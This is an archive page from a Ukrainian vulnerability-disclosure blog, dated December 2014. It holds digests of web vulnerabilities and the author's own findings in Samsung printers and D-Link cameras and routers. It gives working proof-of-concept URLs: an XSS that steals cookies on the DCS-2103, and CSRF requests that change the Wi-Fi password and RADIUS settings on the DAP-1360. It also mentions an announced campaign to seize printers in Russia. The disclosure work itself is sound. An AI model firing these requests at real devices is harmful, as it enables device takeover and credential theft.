Архів для категорії 'Уразливості'

Добірка уразливостей

17:24 23.12.2014

В даній добірці уразливості в веб додатках:

  • Dahua DVR Authentication Bypass (деталі)
  • Unsafe Query Risk in Active Record (деталі)
  • Directory Traversal Vulnerability With Certain Route Configurations in Ruby on Rails (деталі)
  • SOAPpy 0.12.5 Multiple Vulnerabilities (деталі)
  • HP Integrated Lights-Out 4 (iLO4), Remote Cross Site Scripting (XSS), Unauthorized Disclosure of Information (деталі)

Уразливості в плагінах для WordPress №165

23:55 20.12.2014

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах TimThumb Finder, Popup Images і Infocus. Для котрих з’явилися експлоіти. TimThumb Finder - це програма для пошуку TimThumb в плагінах і темах для WP, Popup Images - це плагін для створення попапів, Infocus - це тема движка.

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Уразливості в Samsung SyncThru Web Service

23:59 19.12.2014

У грудні, 16.12.2014, я виявив Information Leakage та Insufficient Authorization уразливості в SyncThru Web Service. Після чого анонсував, що Українські Кібер Війська почали операцію по захопленню мережевих принтерів в Росії.

Це веб додаток для принтерів Samsung, зокрема я знайшов Samsung ML-1865W та інші принтери з ним. Про що найближчим часом повідомлю розробникам.

Information Leakage (WASC-13):

http://site
http://site:631

Можливий доступ без авторизації до інформації про всі налаштування принтера (для читання).

Insufficient Authorization (WASC-02):

В розділі Print Information можна друкувати тестові документи без авторизації. Таким чином без знання логіна і паролю можна витратити папір і картридж принтера.

Також я знаходив інші принтери Samsung (з ранньою версією прошивки), де без авторизації була доступна функція Direct Print. Що дозволяє друкувати довільні документи.

Уразливі Samsung SyncThru Web Service 6.01 та попередні версії.

Добірка уразливостей

17:27 19.12.2014

В даній добірці уразливості в веб додатках:

Уразливості в плагінах для WordPress №164

23:53 17.12.2014

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Booking System, bib2html і Conversion Ninja. Для котрих з’явилися експлоіти. Booking System - це плагін для замовлення білетів, bib2html - це плагін для розміщення bibtex елементів як HTML на сайті, Conversion Ninja - це плагін для спілкування.

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Добірка уразливостей

17:20 17.12.2014

В даній добірці уразливості в веб додатках:

  • Unicorn Router WB-3300NR CSRF (Factory Reset/DNS Change) (деталі)
  • Vulnerabilities in Zend Framework (деталі)
  • Sendy 1.1.9.1 - SQL Injection Vulnerability (деталі)
  • Woltlab Burning Board 3.9.1 pl1 - Persistent Web Vulnerability & Editor Reverse Encoding Issue (деталі)
  • DoS vulnerability in Varnish HTTP cache (деталі)

BF та XSS уразливості в D-Link DCS-2103

17:21 16.12.2014

01.08.2014

У липні, 11.07.2014, я виявив Brute Force та Cross-Site Scripting уразливості в D-Link DCS-2103 (веб камера). Це друга частина дірок в DCS-2103.

Раніше я писав про DT та FPD уразливості в D-Link DCS-2103.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам пристрою.

16.12.2014

Brute Force (WASC-11):

http://site

Немає захисту від BF атак.

Cross-Site Scripting (WASC-08):

http://site/vb.htm?%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

Уразлива версія D-Link DCS-2103, Firmware 1.0.0. Дана модель з іншими прошивками також повинна бути вразливою.

Розробники відмовилися виправляти BF уразливість, а XSS уразливість виправлена в прошивці версії 1.20.

Добірка уразливостей

16:27 12.12.2014

В даній добірці уразливості в веб додатках:

  • HP LoadRunner Virtual User Generator, Remote Code Execution (деталі)
  • Vulnerability in PHPFox v3.7.3, v3.7.4 and v3.7.5 all build (деталі)
  • Pearson eSIS Enterprise Student Information System SQL Injection (деталі)
  • Pearson eSIS Enterprise Student Information System Stored XSS (деталі)
  • strongswan security update (деталі)

Уразливості в плагінах для WordPress №163

23:55 10.12.2014

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Bonuspressx, cnhk-slideshow і Simple Popup. Для котрих з’явилися експлоіти. Bonuspressx - це спеціальний плагін, cnhk-slideshow - це плагін для створення слайдшоу, Simple Popup - це плагін для створення попапів.

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

CSRF та XSS уразливості в D-Link DAP-1360

23:55 29.11.2014

28.06.2014

Продовжуючи тему уразливостей в D-Link DAP-1360. У квітні, 30.04.2014, я виявив уразливості в D-Link DAP-1360 (Wi-Fi Access Point and Router). Це Cross-Site Request Forgery та Cross-Site Scripting уразливості.

Уразлива версія D-Link DAP-1360, Firmware 1.0.0. Дана модель з іншими прошивками також повинна бути вразливою.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам пристрою.

29.11.2014

CSRF (WASC-09):

В розділі Wi-Fi - Basic settings можна змінити параметри Hide Access Point, SSID, Country, Channel, Wireless mode, Max Associated Clients.

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=35&res_struct_size=0&res_buf={%22HideSSID%22:false,%22mbssid%22:[{%22SSID%22:%221%22}],%22CountryCode%22:%22UA%22,%22Channel%22:%22auto%22,%22WirelessMode%22:%229%22,%22MaxStaNum%22:%220%22}

В розділі Wi-Fi - Security settings можна змінити параметри Network Authentication, Encryption Key PSK, WPA2 Pre-authentication (при вибраному WPA2), WPA Encryption, WPA reneval. А також ряд параметрів (як то RADIUS_Server, RADIUS_Port і RADIUS_Key), які відсутні в GUI.

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=36&res_struct_size=0&res_buf={%22RekeyInterval%22:%223600%22,%22mbssid%22:[{%22AuthMode%22:%22WPA2PSK%22,%22WPAPSK%22:%22password%22,%22PreAuth%22:false,%22EncrypType%22:%22AES%22}],%22RADIUS_Server%22:%22192.168.0.254%22,%22RADIUS_Port%22:%221812%22,%22RADIUS_Key%22:%22dlink%22}

Даним запитом змінюються вищезгадані параметри, в тому числі пароль точки доступу.

XSS (WASC-08):

Вставити <script>alert(document.cookie)</script> в поле Quick search. Це Strictly Social XSS.

Нова версія прошивки з виправленням даних уразливостей була розроблена в першій половині листопада. Але вона все ще не вийшла, бо D-Link виявив баги в ній і працює на їх виправленням.